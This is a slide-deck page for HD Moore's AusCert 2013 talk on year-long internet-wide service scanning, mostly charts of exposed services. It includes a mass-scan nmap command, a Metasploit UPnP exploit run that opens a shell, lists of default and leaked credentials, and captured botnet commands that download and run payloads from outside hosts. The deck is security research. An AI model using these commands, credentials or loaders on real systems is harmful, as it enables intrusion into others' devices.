$30 off During Our Annual Pro Sale. View Details »

AusCert 2013: Global Network Security

AusCert 2013: Global Network Security

Video of this presentation can be found at:
https://www.youtube.com/watch?v=ZNlikR11icY

This presentation focused on the results of a 12-month research project that involved scanning the internet at large for a number of common services. The original intent of the project was to identify cases where vendors or ISPs have put large groups of consumers at risk due to negligent practices. These results have been obtained and continue to be collected and analyzed. In addition to the consumer-level issues, quite a few major exposures have been identified during the analysis of the data set. So far, this analysis has helped four other independent research teams quantify their results and resulted in Bloomberg/NYT coverage due to its use in identifying the FinFisher botnet C&C systems (a government-run malware environment). This data is immensely useful for quantifying exposure, identifying new global-scale threats, and creating indicators of future compromise.

HD Moore

May 23, 2013
Tweet

More Decks by HD Moore

Other Decks in Research

Transcript

  1. View Slide




  2. View Slide






  3. View Slide











  4. View Slide




  5. View Slide







  6. # nmap -sS -PS443 -p443 -n --max-retries=1 -n -M 256 \
    --open \
    --min-rtt-timeout=1000ms --max-rtt-timeout=1000ms \
    --min-hostgroup=50000 --min-rate=50000 \
    --max-rate=50000 \
    --script=banner-plus.nse \
    --excludefile=exclude.txt \
    -oG node.gnmap -oX node.xml \
    -iR 250000
    Code: https://gitub.com/hdm/scan-tools

    View Slide








  7. Code: https://gitub.com/hdm/scan-tools

    View Slide











  8. View Slide







  9. View Slide







  10. So what your saying is I should just ignore the excessive amount of port
    snooping coming from your system(s), and I should allow this on your
    word alone? Since when did you become my big brother? Are you
    related to Obama?
    Ironically, since the days you have begun your independent
    scans we have received a few DDOS attacks using udp_app
    port 53 traffic.....any correlation?
    Please identify your customer operating
    from the above address at the time
    mentioned, and terminate immediately
    his hacking activities. Please prevent
    him from continuing his hacking
    activities in the future as well.
    Due to the potential severity of this incident, we have
    reported it to the Computer Emergency Response
    Team (CERT) in United States (US) and Denmark.
    You are welcome to try and hack my
    network as an academic exercise but
    even if you are successful you will find
    nothing of interest, and any attempt to
    corrupt the O/S can be restored in a few
    minutes.

    View Slide










  11. View Slide

  12. 0
    10,000,000
    20,000,000
    30,000,000
    40,000,000
    50,000,000
    60,000,000
    70,000,000
    80,000,000
    90,000,000
    100,000,000
    110,000,000
    120,000,000
    130,000,000
    140,000,000
    1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185
    Unique IPs by Service

    View Slide

  13. 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185
    Global IPv4 Services
    1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185
    Australian IPv4 Services

    View Slide

  14. 0
    10,000,000
    20,000,000
    30,000,000
    40,000,000
    50,000,000
    60,000,000
    70,000,000
    80,000,000
    90,000,000
    100,000,000
    110,000,000
    120,000,000
    130,000,000
    140,000,000
    1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185
    Unique IPs by Service


    View Slide







  15. View Slide









  16. ► Intel/Portable SDK
    MiniUPnP
    Broadcom SDK
    Others

    View Slide











  17. View Slide





  18. $ msfconsole
    msf > use exploit/multi/upnp/libupnp_ssdp_overflow
    msf exploit(libupnp_ssdp_overflow) > set RHOST 192.168.122.89
    msf exploit(libupnp_ssdp_overflow) > exploit
    [*] Started reverse double handler
    [*] Exploiting 192.168.122.89 with target Supermicro Onboard IPMI (X9SCL/X9SCM)
    [+] Sending payload of 178 bytes to 192.168.122.89:56911...
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command shell session 1 opened
    [*] Shutting down payload stager listener...
    uname -a
    Linux debian-armel 2.6.32-5-versatile #1 Wed Jan 12 23:05:11 UTC 2011 armv5tejl

    View Slide

  19. 0
    10,000,000
    20,000,000
    30,000,000
    40,000,000
    50,000,000
    60,000,000
    70,000,000
    80,000,000
    90,000,000
    100,000,000
    110,000,000
    120,000,000
    130,000,000
    140,000,000
    1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185
    Unique IPs by Service



    View Slide




  20. Apache
    Microsoft
    NginX
    Netcraft - January 2013
    RomPager
    Apache
    Akamai
    NginX
    Microsoft
    Critical.IO - January 2013

    View Slide

  21. 0
    10,000,000
    20,000,000
    30,000,000
    40,000,000
    50,000,000
    60,000,000
    70,000,000
    80,000,000
    90,000,000
    100,000,000
    110,000,000
    120,000,000
    130,000,000
    140,000,000
    1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185
    Unique IPs by Service

    View Slide







  22. USA ESP IND TUR BRA ITA DEU POL RUS THA VNM CHN PER MYS ARG EGY GBR TWN KOR IDN
    Devices by Country

    View Slide







  23. View Slide








  24. View Slide

  25. Usernames Passwords
    admin 12345
    root h3capadmin
    lyzdm xialiang!@#
    lywlj nhkhwlwhz
    lymr admin
    lyjy 1234
    lyzwm szwx@ah
    lyys huawei
    jlllylj itms123456
    lygsg AAA888###
    lyjrw 662
    lyyys abc123!
    lysw zch3capadmin
    lygmb 123456
    lyfyh apadmin
    huawei password

    View Slide






  26. username=sa password=Masterkey2011 LicenseCheck=Defne
    DSN=sms;UID=XXX;PWD=XXXsys; DSN=GeoXXX;UID=XXX;PWD=XXXsys; 8383
    password h4ve@gr8d3y
    --daemon --port 8020 --socks5 --s_user Windows --s_password System
    XXXX /ssh /auth=password /user=admin /passwd=admin_p@s$word
    http://a.b.c/manage/retail_login.php3?ms_id=14320101&passwd=7325
    a.b.c.d:3389 --user administrator --pass passw0rd123

    View Slide







  27. View Slide

  28. 0
    10,000,000
    20,000,000
    30,000,000
    40,000,000
    50,000,000
    60,000,000
    70,000,000
    80,000,000
    90,000,000
    100,000,000
    110,000,000
    120,000,000
    130,000,000
    140,000,000
    1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185
    Unique IPs by Service


    View Slide





  29. HUAWEI QUALCOMM ASUSTEK VMWARE HP DELL HYUNDAI MICROSOFT INTEL

    View Slide

  30. 0
    10,000,000
    20,000,000
    30,000,000
    40,000,000
    50,000,000
    60,000,000
    70,000,000
    80,000,000
    90,000,000
    100,000,000
    110,000,000
    120,000,000
    130,000,000
    140,000,000
    1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185
    Unique IPs by Service



    View Slide





  31. 27%
    15%
    10%
    7%
    5%
    29%
    FTP Software
    ProFTPD
    PureFTP
    Microsoft
    Firmware
    vsFTPd
    Mikrotik
    FileZilla
    Speedtouch
    Other
    1.3.3g
    1.3.1
    1.3.3a
    1.3.4a
    1.3.3e
    1.3.2e
    ProFTPD Versions 1.3.3g
    1.3.1
    1.3.3a
    1.3.4a
    1.3.3e
    1.3.2e
    1.3.3c
    1.3.4b
    1.3.0
    1.3.3d
    1.3.2c
    1.2.10
    1.3.0a
    1.2.9
    1.3.5rc1
    1.3.2

    View Slide

  32. 0
    10,000,000
    20,000,000
    30,000,000
    40,000,000
    50,000,000
    60,000,000
    70,000,000
    80,000,000
    90,000,000
    100,000,000
    110,000,000
    120,000,000
    130,000,000
    140,000,000
    1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185
    Unique IPs by Service



    View Slide

  33. SMTP
    POP3
    IMAP
    POP3S
    IMAPS

    View Slide

  34. 0
    10,000,000
    20,000,000
    30,000,000
    40,000,000
    50,000,000
    60,000,000
    70,000,000
    80,000,000
    90,000,000
    100,000,000
    110,000,000
    120,000,000
    130,000,000
    140,000,000
    1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185
    Unique IPs by Service


    View Slide




  35. VNC Protocol Versions
    RFB 003.008
    RFB 003.889
    RFB 003.006
    RFB 003.003
    RFB 004.001
    RFB 004.000
    RFB 003.007
    RFB 003.004

    View Slide




  36. View Slide

  37. 0
    10,000,000
    20,000,000
    30,000,000
    40,000,000
    50,000,000
    60,000,000
    70,000,000
    80,000,000
    90,000,000
    100,000,000
    110,000,000
    120,000,000
    130,000,000
    140,000,000
    1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185
    Unique IPs by Service


    View Slide







  38. View Slide





  39. 0
    1000
    2000
    3000
    4000
    5000
    6000
    OpenServer AIX Solaris UnixWare IRIX OpenVMS HPUX

    View Slide


  40. View Slide


  41. View Slide


  42. View Slide



  43. View Slide

  44. View Slide










  45. View Slide












  46. View Slide

  47. View Slide





  48. $ telnet A.B.C.D
    Escape character is '^]'.
    sh-3.00# history
    1 root
    2 admin
    3 mkdir /var/run; mkdir /var/run/.sysV6 && cd /var/run/.sysV6 &&
    wget -c http://176.xxx.xxx.xxx/sysV6/sysV6.sh && sh sysV6.sh ||
    mkdir /var/run/.sysV6 && cd /var/run/.sysV6 &&
    ftpget -u skynet -p cloud 176.xxx.xxx.xxx sysV6.sh sysV6/sysV6.sh &&
    sh sysV6.sh &

    View Slide



  49. # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
    # UPLOAD GETBINARIES.SH IN YOUR HTTPD.
    # YOUR HTTPD SERVER:
    REFERENCE_HTTP="http://173.xxx.xxx.xxx"
    wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run …
    wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && …
    wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && …
    wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && …
    wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && …
    wget -c ${REFERENCE_HTTP}/sshd -P /var/run && …
    wget -c ${REFERENCE_HTTP}/telnetd -P /var/run && …
    iptables -A INPUT -p tcp --dport 23 -j DROP
    mv /usr/bin/wget /usr/bin/wg
    mv /bin/wget /bin /wg

    View Slide









  50. View Slide





  51. View Slide

  52. View Slide